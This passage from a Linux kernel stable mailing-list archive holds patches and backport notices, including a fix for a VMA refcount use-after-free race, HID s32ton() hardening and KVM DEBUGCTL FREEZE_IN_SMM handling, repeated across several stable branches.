will then detect the mismatching ->vm_mm pointer and drop the VMA through
vma_end_read(), which calls vma_refcount_put(). vma_refcount_put() drops
the refcount and then calls rcuwait_wake_up() using a copy of vma->vm_mm.
This is wrong: It implicitly assumes that the caller is keeping the VMA's
mm alive, but in this scenario the caller has no relation to the VMA's mm,
so the rcuwait_wake_up() can cause UAF.
The diagram depicting the race:
T1 T2 T3
== == ==
lock_vma_under_rcu
mas_walk
<VMA gets removed from mm>
mmap
<the same VMA is reallocated>
vma_start_read
__refcount_inc_not_zero_limited_acquire
munmap
__vma_enter_locked
refcount_add_not_zero
vma_end_read
vma_refcount_put
__refcount_dec_and_test
rcuwait_wait_event
<finish operation>
rcuwait_wake_up [UAF]
Note that rcuwait_wait_event() in T3 does not block because refcount was
already dropped by T1. At this point T3 can exit and free the mm causing
UAF in T1.
To avoid this we move vma->vm_mm verification into vma_start_read() and
grab vma->vm_mm to stabilize it before vma_refcount_put() operation.
[surenb(a)google.com: v3]
Link: https://lkml.kernel.org/r/20250729145709.2731370-1-surenb@google.com
Link: https://lkml.kernel.org/r/20250728175355.2282375-1-surenb@google.com
Fixes: 3104138517fc ("mm: make vma cache SLAB_TYPESAFE_BY_RCU")
Signed-off-by: Suren Baghdasaryan <surenb(a)google.com>
Reported-by: Jann Horn <jannh(a)google.com>
Closes: https://lore.kernel.org/all/CAG48ez0-deFbVH=E3jbkWx=X3uVbd8nWeo6kbJPQ0KoUD+…
Reviewed-by: Vlastimil Babka <vbabka(a)suse.cz>
Acked-by: Lorenzo Stoakes <lorenzo.stoakes(a)oracle.com>
Cc: Jann Horn <jannh(a)google.com>
Cc: Liam Howlett <liam.howlett(a)oracle.com>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
diff --git a/include/linux/mmap_lock.h b/include/linux/mmap_lock.h
index 1f4f44951abe..11a078de9150 100644
--- a/include/linux/mmap_lock.h
+++ b/include/linux/mmap_lock.h
@@ -12,6 +12,7 @@ extern int rcuwait_wake_up(struct rcuwait *w);
#include <linux/tracepoint-defs.h>
#include <linux/types.h>
#include <linux/cleanup.h>
+#include <linux/sched/mm.h>
#define MMAP_LOCK_INITIALIZER(name) \
.mmap_lock = __RWSEM_INITIALIZER((name).mmap_lock),
@@ -154,6 +155,10 @@ static inline void vma_refcount_put(struct vm_area_struct *vma)
* reused and attached to a different mm before we lock it.
* Returns the vma on success, NULL on failure to lock and EAGAIN if vma got
* detached.
+ *
+ * WARNING! The vma passed to this function cannot be used if the function
+ * fails to lock it because in certain cases RCU lock is dropped and then
+ * reacquired. Once RCU lock is dropped the vma can be concurently freed.
*/
static inline struct vm_area_struct *vma_start_read(struct mm_struct *mm,
struct vm_area_struct *vma)
@@ -183,6 +188,31 @@ static inline struct vm_area_struct *vma_start_read(struct mm_struct *mm,
}
rwsem_acquire_read(&vma->vmlock_dep_map, 0, 1, _RET_IP_);
+
+ /*
+ * If vma got attached to another mm from under us, that mm is not
+ * stable and can be freed in the narrow window after vma->vm_refcnt
+ * is dropped and before rcuwait_wake_up(mm) is called. Grab it before
+ * releasing vma->vm_refcnt.
+ */
+ if (unlikely(vma->vm_mm != mm)) {
+ /* Use a copy of vm_mm in case vma is freed after we drop vm_refcnt */
+ struct mm_struct *other_mm = vma->vm_mm;
+
+ /*
+ * __mmdrop() is a heavy operation and we don't need RCU
+ * protection here. Release RCU lock during these operations.
+ * We reinstate the RCU read lock as the caller expects it to
+ * be held when this function returns even on error.
+ */
+ rcu_read_unlock();
+ mmgrab(other_mm);
+ vma_refcount_put(vma);
+ mmdrop(other_mm);
+ rcu_read_lock();
+ return NULL;
+ }
+
/*
* Overflow of vm_lock_seq/mm_lock_seq might produce false locked result.
* False unlocked result is impossible because we modify and check
diff --git a/mm/mmap_lock.c b/mm/mmap_lock.c
index 729fb7d0dd59..b006cec8e6fe 100644
--- a/mm/mmap_lock.c
+++ b/mm/mmap_lock.c
@@ -164,8 +164,7 @@ struct vm_area_struct *lock_vma_under_rcu(struct mm_struct *mm,
*/
/* Check if the vma we locked is the right one. */
- if (unlikely(vma->vm_mm != mm ||
- address < vma->vm_start || address >= vma->vm_end))
+ if (unlikely(address < vma->vm_start || address >= vma->vm_end))
goto inval_end_read;
rcu_read_unlock();
@@ -236,11 +235,8 @@ struct vm_area_struct *lock_next_vma(struct mm_struct *mm,
goto fallback;
}
- /*
- * Verify the vma we locked belongs to the same address space and it's
- * not behind of the last search position.
- */
- if (unlikely(vma->vm_mm != mm || from_addr >= vma->vm_end))
+ /* Verify the vma is not behind the last search position. */
+ if (unlikely(from_addr >= vma->vm_end))
goto fallback_unlock;
/*
On Wed, Aug 13, 2025 at 12:29:10AM +0800, Zenm Chen wrote:
> Hi Greg,
>
> Sorry that my patch [1] didn't clearly tell which kernels it should apply
> to.
>
> The Bluetooth support for Realtek RTL8851BE/RTL8851BU chips was added into
> the kernel since 6.4 [2], so please don't apply this patch to kernel 6.1,
> 5.15 and other older stable kernels, thank you very much!
>
> [1] Bluetooth: btusb: Add USB ID 3625:010b for TP-LINK Archer TX10UB Nano
> https://lore.kernel.org/stable/20250521013020.1983-1-zenmchen@gmail.com/
>
> [2] Bluetooth: btrtl: Add the support for RTL8851B
> https://github.com/torvalds/linux/commit/7948fe1c92d92313eea5453f83deb7f014…
Ok, now dropped, thanks.
greg k-h
On 6/25/2025 3:15 AM, Baochen Qiang wrote:
>
>
> On 6/25/2025 5:51 PM, Johan Hovold wrote:
>> [ +CC: Gregoire ]
>>
>> On Fri, May 23, 2025 at 11:49:00AM +0800, Baochen Qiang wrote:
>>> We got report that WCN7850 is not working with IWD [1][2]. Debug
>>> shows the reason is that IWD installs group key before pairwise
>>> key, which goes against WCN7850's firmware.
>>>
>>> Reorder key install to workaround this.
>>>
>>> [1] https://bugzilla.kernel.org/show_bug.cgi?id=218733
>>> [2] https://lore.kernel.org/all/AS8P190MB12051DDBD84CD88E71C40AD7873F2@AS8P190M…
>>>
>>> Signed-off-by: Baochen Qiang <quic_bqiang(a)quicinc.com>
>>> ---
>>> ---
>>> Baochen Qiang (2):
>>> wifi: ath12k: avoid bit operation on key flags
>>> wifi: ath12k: install pairwise key first
>>
>> Thanks for fixing this, Baochen.
>>
>> I noticed the patches weren't clearly marked as fixes. Do you think we
>> should ask the stable team to backport these once they are in mainline
>> (e.g. after 6.17-rc1 is out)? Or do you think they are too intrusive and
>> risky to backport or similar?
>
> Yeah, I think they should be backported.
>
>>
>> [ Also please try to remember to CC any (public) reporters. I only found
>> out today that this had been addressed in linux-next. ]
>
> Thanks, will keep in mind.
+Stable team,
Per the above discussion please backport the series:
https://msgid.link/20250523-ath12k-unicast-key-first-v1-0-f53c3880e6d8@quic…
This is a 0-day issue so ideally this should be backported from 6.6+
/jeff
The patch below does not apply to the 5.4-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.4.y
git checkout FETCH_HEAD
git cherry-pick -x a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081235-dinghy-spectrum-644a@gregkh' --subject-prefix 'PATCH 5.4.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd Mon Sep 17 00:00:00 2001
From: Alan Stern <stern(a)rowland.harvard.edu>
Date: Wed, 23 Jul 2025 10:37:04 -0400
Subject: [PATCH] HID: core: Harden s32ton() against conversion to 0 bits
Testing by the syzbot fuzzer showed that the HID core gets a
shift-out-of-bounds exception when it tries to convert a 32-bit
quantity to a 0-bit quantity. Ideally this should never occur, but
there are buggy devices and some might have a report field with size
set to zero; we shouldn't reject the report or the device just because
of that.
Instead, harden the s32ton() routine so that it returns a reasonable
result instead of crashing when it is called with the number of bits
set to 0 -- the same as what snto32() does.
Signed-off-by: Alan Stern <stern(a)rowland.harvard.edu>
Reported-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Closes: https://lore.kernel.org/linux-usb/68753a08.050a0220.33d347.0008.GAE@google.…
Tested-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Fixes: dde5845a529f ("[PATCH] Generic HID layer - code split")
Cc: stable(a)vger.kernel.org
Link: https://patch.msgid.link/613a66cd-4309-4bce-a4f7-2905f9bce0c9@rowland.harva…
Signed-off-by: Benjamin Tissoires <bentiss(a)kernel.org>
diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
index ef1f79951d9b..f7d4efcae603 100644
--- a/drivers/hid/hid-core.c
+++ b/drivers/hid/hid-core.c
@@ -66,8 +66,12 @@ static s32 snto32(__u32 value, unsigned int n)
static u32 s32ton(__s32 value, unsigned int n)
{
- s32 a = value >> (n - 1);
+ s32 a;
+ if (!value || !n)
+ return 0;
+
+ a = value >> (n - 1);
if (a && a != -1)
return value < 0 ? 1 << (n - 1) : (1 << (n - 1)) - 1;
return value & ((1 << n) - 1);
The patch below does not apply to the 5.15-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.15.y
git checkout FETCH_HEAD
git cherry-pick -x a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081233-stamp-fiddling-ffca@gregkh' --subject-prefix 'PATCH 5.15.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd Mon Sep 17 00:00:00 2001
From: Alan Stern <stern(a)rowland.harvard.edu>
Date: Wed, 23 Jul 2025 10:37:04 -0400
Subject: [PATCH] HID: core: Harden s32ton() against conversion to 0 bits
Testing by the syzbot fuzzer showed that the HID core gets a
shift-out-of-bounds exception when it tries to convert a 32-bit
quantity to a 0-bit quantity. Ideally this should never occur, but
there are buggy devices and some might have a report field with size
set to zero; we shouldn't reject the report or the device just because
of that.
Instead, harden the s32ton() routine so that it returns a reasonable
result instead of crashing when it is called with the number of bits
set to 0 -- the same as what snto32() does.
Signed-off-by: Alan Stern <stern(a)rowland.harvard.edu>
Reported-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Closes: https://lore.kernel.org/linux-usb/68753a08.050a0220.33d347.0008.GAE@google.…
Tested-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Fixes: dde5845a529f ("[PATCH] Generic HID layer - code split")
Cc: stable(a)vger.kernel.org
Link: https://patch.msgid.link/613a66cd-4309-4bce-a4f7-2905f9bce0c9@rowland.harva…
Signed-off-by: Benjamin Tissoires <bentiss(a)kernel.org>
diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
index ef1f79951d9b..f7d4efcae603 100644
--- a/drivers/hid/hid-core.c
+++ b/drivers/hid/hid-core.c
@@ -66,8 +66,12 @@ static s32 snto32(__u32 value, unsigned int n)
static u32 s32ton(__s32 value, unsigned int n)
{
- s32 a = value >> (n - 1);
+ s32 a;
+ if (!value || !n)
+ return 0;
+
+ a = value >> (n - 1);
if (a && a != -1)
return value < 0 ? 1 << (n - 1) : (1 << (n - 1)) - 1;
return value & ((1 << n) - 1);
The patch below does not apply to the 5.10-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.10.y
git checkout FETCH_HEAD
git cherry-pick -x a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081234-unmapped-serpent-9b0d@gregkh' --subject-prefix 'PATCH 5.10.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd Mon Sep 17 00:00:00 2001
From: Alan Stern <stern(a)rowland.harvard.edu>
Date: Wed, 23 Jul 2025 10:37:04 -0400
Subject: [PATCH] HID: core: Harden s32ton() against conversion to 0 bits
Testing by the syzbot fuzzer showed that the HID core gets a
shift-out-of-bounds exception when it tries to convert a 32-bit
quantity to a 0-bit quantity. Ideally this should never occur, but
there are buggy devices and some might have a report field with size
set to zero; we shouldn't reject the report or the device just because
of that.
Instead, harden the s32ton() routine so that it returns a reasonable
result instead of crashing when it is called with the number of bits
set to 0 -- the same as what snto32() does.
Signed-off-by: Alan Stern <stern(a)rowland.harvard.edu>
Reported-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Closes: https://lore.kernel.org/linux-usb/68753a08.050a0220.33d347.0008.GAE@google.…
Tested-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Fixes: dde5845a529f ("[PATCH] Generic HID layer - code split")
Cc: stable(a)vger.kernel.org
Link: https://patch.msgid.link/613a66cd-4309-4bce-a4f7-2905f9bce0c9@rowland.harva…
Signed-off-by: Benjamin Tissoires <bentiss(a)kernel.org>
diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
index ef1f79951d9b..f7d4efcae603 100644
--- a/drivers/hid/hid-core.c
+++ b/drivers/hid/hid-core.c
@@ -66,8 +66,12 @@ static s32 snto32(__u32 value, unsigned int n)
static u32 s32ton(__s32 value, unsigned int n)
{
- s32 a = value >> (n - 1);
+ s32 a;
+ if (!value || !n)
+ return 0;
+
+ a = value >> (n - 1);
if (a && a != -1)
return value < 0 ? 1 << (n - 1) : (1 << (n - 1)) - 1;
return value & ((1 << n) - 1);
The patch below does not apply to the 6.1-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.1.y
git checkout FETCH_HEAD
git cherry-pick -x a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081233-observing-prepay-25da@gregkh' --subject-prefix 'PATCH 6.1.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd Mon Sep 17 00:00:00 2001
From: Alan Stern <stern(a)rowland.harvard.edu>
Date: Wed, 23 Jul 2025 10:37:04 -0400
Subject: [PATCH] HID: core: Harden s32ton() against conversion to 0 bits
Testing by the syzbot fuzzer showed that the HID core gets a
shift-out-of-bounds exception when it tries to convert a 32-bit
quantity to a 0-bit quantity. Ideally this should never occur, but
there are buggy devices and some might have a report field with size
set to zero; we shouldn't reject the report or the device just because
of that.
Instead, harden the s32ton() routine so that it returns a reasonable
result instead of crashing when it is called with the number of bits
set to 0 -- the same as what snto32() does.
Signed-off-by: Alan Stern <stern(a)rowland.harvard.edu>
Reported-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Closes: https://lore.kernel.org/linux-usb/68753a08.050a0220.33d347.0008.GAE@google.…
Tested-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Fixes: dde5845a529f ("[PATCH] Generic HID layer - code split")
Cc: stable(a)vger.kernel.org
Link: https://patch.msgid.link/613a66cd-4309-4bce-a4f7-2905f9bce0c9@rowland.harva…
Signed-off-by: Benjamin Tissoires <bentiss(a)kernel.org>
diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
index ef1f79951d9b..f7d4efcae603 100644
--- a/drivers/hid/hid-core.c
+++ b/drivers/hid/hid-core.c
@@ -66,8 +66,12 @@ static s32 snto32(__u32 value, unsigned int n)
static u32 s32ton(__s32 value, unsigned int n)
{
- s32 a = value >> (n - 1);
+ s32 a;
+ if (!value || !n)
+ return 0;
+
+ a = value >> (n - 1);
if (a && a != -1)
return value < 0 ? 1 << (n - 1) : (1 << (n - 1)) - 1;
return value & ((1 << n) - 1);
The patch below does not apply to the 6.6-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-6.6.y
git checkout FETCH_HEAD
git cherry-pick -x a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081232-immovable-among-3b59@gregkh' --subject-prefix 'PATCH 6.6.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From a6b87bfc2ab5bccb7ad953693c85d9062aef3fdd Mon Sep 17 00:00:00 2001
From: Alan Stern <stern(a)rowland.harvard.edu>
Date: Wed, 23 Jul 2025 10:37:04 -0400
Subject: [PATCH] HID: core: Harden s32ton() against conversion to 0 bits
Testing by the syzbot fuzzer showed that the HID core gets a
shift-out-of-bounds exception when it tries to convert a 32-bit
quantity to a 0-bit quantity. Ideally this should never occur, but
there are buggy devices and some might have a report field with size
set to zero; we shouldn't reject the report or the device just because
of that.
Instead, harden the s32ton() routine so that it returns a reasonable
result instead of crashing when it is called with the number of bits
set to 0 -- the same as what snto32() does.
Signed-off-by: Alan Stern <stern(a)rowland.harvard.edu>
Reported-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Closes: https://lore.kernel.org/linux-usb/68753a08.050a0220.33d347.0008.GAE@google.…
Tested-by: syzbot+b63d677d63bcac06cf90(a)syzkaller.appspotmail.com
Fixes: dde5845a529f ("[PATCH] Generic HID layer - code split")
Cc: stable(a)vger.kernel.org
Link: https://patch.msgid.link/613a66cd-4309-4bce-a4f7-2905f9bce0c9@rowland.harva…
Signed-off-by: Benjamin Tissoires <bentiss(a)kernel.org>
diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
index ef1f79951d9b..f7d4efcae603 100644
--- a/drivers/hid/hid-core.c
+++ b/drivers/hid/hid-core.c
@@ -66,8 +66,12 @@ static s32 snto32(__u32 value, unsigned int n)
static u32 s32ton(__s32 value, unsigned int n)
{
- s32 a = value >> (n - 1);
+ s32 a;
+ if (!value || !n)
+ return 0;
+
+ a = value >> (n - 1);
if (a && a != -1)
return value < 0 ? 1 << (n - 1) : (1 << (n - 1)) - 1;
return value & ((1 << n) - 1);
The patch below does not apply to the 5.4-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.4.y
git checkout FETCH_HEAD
git cherry-pick -x 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081238-veggie-abrasive-ce80@gregkh' --subject-prefix 'PATCH 5.4.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:10 -0700
Subject: [PATCH] KVM: VMX: Preserve host's DEBUGCTLMSR_FREEZE_IN_SMM while
running the guest
Set/clear DEBUGCTLMSR_FREEZE_IN_SMM in GUEST_IA32_DEBUGCTL based on the
host's pre-VM-Enter value, i.e. preserve the host's FREEZE_IN_SMM setting
while running the guest. When running with the "default treatment of SMIs"
in effect (the only mode KVM supports), SMIs do not generate a VM-Exit that
is visible to host (non-SMM) software, and instead transitions directly
from VMX non-root to SMM. And critically, DEBUGCTL isn't context switched
by hardware on SMI or RSM, i.e. SMM will run with whatever value was
resident in hardware at the time of the SMI.
Failure to preserve FREEZE_IN_SMM results in the PMU unexpectedly counting
events while the CPU is executing in SMM, which can pollute profiling and
potentially leak information into the guest.
Check for changes in FREEZE_IN_SMM prior to every entry into KVM's inner
run loop, as the bit can be toggled in IRQ context via IPI callback (SMP
function call), by way of /sys/devices/cpu/freeze_on_smi.
Add a field in kvm_x86_ops to communicate which DEBUGCTL bits need to be
preserved, as FREEZE_IN_SMM is only supported and defined for Intel CPUs,
i.e. explicitly checking FREEZE_IN_SMM in common x86 is at best weird, and
at worst could lead to undesirable behavior in the future if AMD CPUs ever
happened to pick up a collision with the bit.
Exempt TDX vCPUs, i.e. protected guests, from the check, as the TDX Module
owns and controls GUEST_IA32_DEBUGCTL.
WARN in SVM if KVM_RUN_LOAD_DEBUGCTL is set, mostly to document that the
lack of handling isn't a KVM bug (TDX already WARNs on any run_flag).
Lastly, explicitly reload GUEST_IA32_DEBUGCTL on a VM-Fail that is missed
by KVM but detected by hardware, i.e. in nested_vmx_restore_host_state().
Doing so avoids the need to track host_debugctl on a per-VMCS basis, as
GUEST_IA32_DEBUGCTL is unconditionally written by prepare_vmcs02() and
load_vmcs12_host_state(). For the VM-Fail case, even though KVM won't
have actually entered the guest, vcpu_enter_guest() will have run with
vmcs02 active and thus could result in vmcs01 being run with a stale value.
Cc: stable(a)vger.kernel.org
Signed-off-by: Maxim Levitsky <mlevitsk(a)redhat.com>
Co-developed-by: Sean Christopherson <seanjc(a)google.com>
Link: https://lore.kernel.org/r/20250610232010.162191-9-seanjc@google.com
Signed-off-by: Sean Christopherson <seanjc(a)google.com>
diff --git a/arch/x86/include/asm/kvm_host.h b/arch/x86/include/asm/kvm_host.h
index 4f7ee2dbf10e..5e0415a8ee3f 100644
--- a/arch/x86/include/asm/kvm_host.h
+++ b/arch/x86/include/asm/kvm_host.h
@@ -1677,6 +1677,7 @@ static inline u16 kvm_lapic_irq_dest_mode(bool dest_mode_logical)
enum kvm_x86_run_flags {
KVM_RUN_FORCE_IMMEDIATE_EXIT = BIT(0),
KVM_RUN_LOAD_GUEST_DR6 = BIT(1),
+ KVM_RUN_LOAD_DEBUGCTL = BIT(2),
};
struct kvm_x86_ops {
@@ -1707,6 +1708,12 @@ struct kvm_x86_ops {
void (*vcpu_load)(struct kvm_vcpu *vcpu, int cpu);
void (*vcpu_put)(struct kvm_vcpu *vcpu);
+ /*
+ * Mask of DEBUGCTL bits that are owned by the host, i.e. that need to
+ * match the host's value even while the guest is active.
+ */
+ const u64 HOST_OWNED_DEBUGCTL;
+
void (*update_exception_bitmap)(struct kvm_vcpu *vcpu);
int (*get_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
int (*set_msr)(struct kvm_vcpu *vcpu, struct msr_data *msr);
diff --git a/arch/x86/kvm/vmx/main.c b/arch/x86/kvm/vmx/main.c
index c85cbce6d2f6..4a6d4460f947 100644
--- a/arch/x86/kvm/vmx/main.c
+++ b/arch/x86/kvm/vmx/main.c
@@ -915,6 +915,8 @@ struct kvm_x86_ops vt_x86_ops __initdata = {
.vcpu_load = vt_op(vcpu_load),
.vcpu_put = vt_op(vcpu_put),
+ .HOST_OWNED_DEBUGCTL = DEBUGCTLMSR_FREEZE_IN_SMM,
+
.update_exception_bitmap = vt_op(update_exception_bitmap),
.get_feature_msr = vmx_get_feature_msr,
.get_msr = vt_op(get_msr),
diff --git a/arch/x86/kvm/vmx/nested.c b/arch/x86/kvm/vmx/nested.c
index ef20184b8b11..c69df3aba8d1 100644
--- a/arch/x86/kvm/vmx/nested.c
+++ b/arch/x86/kvm/vmx/nested.c
@@ -4861,6 +4861,9 @@ static void nested_vmx_restore_host_state(struct kvm_vcpu *vcpu)
WARN_ON(kvm_set_dr(vcpu, 7, vmcs_readl(GUEST_DR7)));
}
+ /* Reload DEBUGCTL to ensure vmcs01 has a fresh FREEZE_IN_SMM value. */
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Note that calling vmx_set_{efer,cr0,cr4} is important as they
* handle a variety of side effects to KVM's software model.
diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
index a77d325fe78b..0db1bd383302 100644
--- a/arch/x86/kvm/vmx/vmx.c
+++ b/arch/x86/kvm/vmx/vmx.c
@@ -7377,6 +7377,9 @@ fastpath_t vmx_vcpu_run(struct kvm_vcpu *vcpu, u64 run_flags)
if (run_flags & KVM_RUN_LOAD_GUEST_DR6)
set_debugreg(vcpu->arch.dr6, 6);
+ if (run_flags & KVM_RUN_LOAD_DEBUGCTL)
+ vmx_reload_guest_debugctl(vcpu);
+
/*
* Refresh vmcs.HOST_CR3 if necessary. This must be done immediately
* prior to VM-Enter, as the kernel may load a new ASID (PCID) any time
diff --git a/arch/x86/kvm/vmx/vmx.h b/arch/x86/kvm/vmx/vmx.h
index c20a4185d10a..076af78af151 100644
--- a/arch/x86/kvm/vmx/vmx.h
+++ b/arch/x86/kvm/vmx/vmx.h
@@ -419,12 +419,25 @@ bool vmx_is_valid_debugctl(struct kvm_vcpu *vcpu, u64 data, bool host_initiated)
static inline void vmx_guest_debugctl_write(struct kvm_vcpu *vcpu, u64 val)
{
+ WARN_ON_ONCE(val & DEBUGCTLMSR_FREEZE_IN_SMM);
+
+ val |= vcpu->arch.host_debugctl & DEBUGCTLMSR_FREEZE_IN_SMM;
vmcs_write64(GUEST_IA32_DEBUGCTL, val);
}
static inline u64 vmx_guest_debugctl_read(void)
{
- return vmcs_read64(GUEST_IA32_DEBUGCTL);
+ return vmcs_read64(GUEST_IA32_DEBUGCTL) & ~DEBUGCTLMSR_FREEZE_IN_SMM;
+}
+
+static inline void vmx_reload_guest_debugctl(struct kvm_vcpu *vcpu)
+{
+ u64 val = vmcs_read64(GUEST_IA32_DEBUGCTL);
+
+ if (!((val ^ vcpu->arch.host_debugctl) & DEBUGCTLMSR_FREEZE_IN_SMM))
+ return;
+
+ vmx_guest_debugctl_write(vcpu, val & ~DEBUGCTLMSR_FREEZE_IN_SMM);
}
/*
diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
index 7fe3549bbd93..179c2c550c8d 100644
--- a/arch/x86/kvm/x86.c
+++ b/arch/x86/kvm/x86.c
@@ -10779,7 +10779,7 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
dm_request_for_irq_injection(vcpu) &&
kvm_cpu_accept_dm_intr(vcpu);
fastpath_t exit_fastpath;
- u64 run_flags;
+ u64 run_flags, debug_ctl;
bool req_immediate_exit = false;
@@ -11051,7 +11051,17 @@ static int vcpu_enter_guest(struct kvm_vcpu *vcpu)
set_debugreg(0, 7);
}
- vcpu->arch.host_debugctl = get_debugctlmsr();
+ /*
+ * Refresh the host DEBUGCTL snapshot after disabling IRQs, as DEBUGCTL
+ * can be modified in IRQ context, e.g. via SMP function calls. Inform
+ * vendor code if any host-owned bits were changed, e.g. so that the
+ * value loaded into hardware while running the guest can be updated.
+ */
+ debug_ctl = get_debugctlmsr();
+ if ((debug_ctl ^ vcpu->arch.host_debugctl) & kvm_x86_ops.HOST_OWNED_DEBUGCTL &&
+ !vcpu->arch.guest_state_protected)
+ run_flags |= KVM_RUN_LOAD_DEBUGCTL;
+ vcpu->arch.host_debugctl = debug_ctl;
guest_timing_enter_irqoff();
The patch below does not apply to the 5.10-stable tree.
If someone wants it applied there, or to any other stable or longterm
tree, then please email the backport, including the original git commit
id to <stable(a)vger.kernel.org>.
To reproduce the conflict and resubmit, you may use the following commands:
git fetch https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/ linux-5.10.y
git checkout FETCH_HEAD
git cherry-pick -x 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a
# <resolve conflicts, build, test, etc.>
git commit -s
git send-email --to '<stable(a)vger.kernel.org>' --in-reply-to '2025081237-acclaim-finished-f854@gregkh' --subject-prefix 'PATCH 5.10.y' HEAD^..
Possible dependencies:
thanks,
greg k-h
------------------ original commit in Linus's tree ------------------
From 6b1dd26544d045f6a79e8c73572c0c0db3ef3c1a Mon Sep 17 00:00:00 2001
From: Maxim Levitsky <mlevitsk(a)redhat.com>
Date: Tue, 10 Jun 2025 16:20:10 -0700
Subject: [PATCH] KVM: VMX: Preserve host's DEBUGCTLMSR_FREEZE_IN_SMM while
running the guest
Set/clear DEBUGCTLMSR_FREEZE_IN_SMM in GUEST_IA32_DEBUGCTL based on the
host's pre-VM-Enter value, i.e. preserve the host's FREEZE_IN_SMM setting
while running the guest. When running with the "default treatment of SMIs"
in effect (the only mode KVM supports), SMIs do not generate a VM-Exit that
is visible to host (non-SMM) software, and instead transitions directly
from VMX non-root to SMM. And critically, DEBUGCTL isn't context switched
by hardware on SMI or RSM, i.e. SMM will run with whatever value was
resident in hardware at the time of the SMI.
Failure to preserve FREEZE_IN_SMM results in the PMU unexpectedly counting
events while the CPU is executing in SMM, which can pollute profiling and
potentially leak information into the guest.
Check for changes in FREEZE_IN_SMM prior to every entry into KVM's inner
run loop, as the bit can be toggled in IRQ context via IPI callback (SMP
function call), by way of /sys/devices/cpu/freeze_on_smi.
Add a field in kvm_x86_ops to communicate which DEBUGCTL bits need to be
preserved, as FREEZE_IN_SMM is only supported and defined for Intel CPUs,
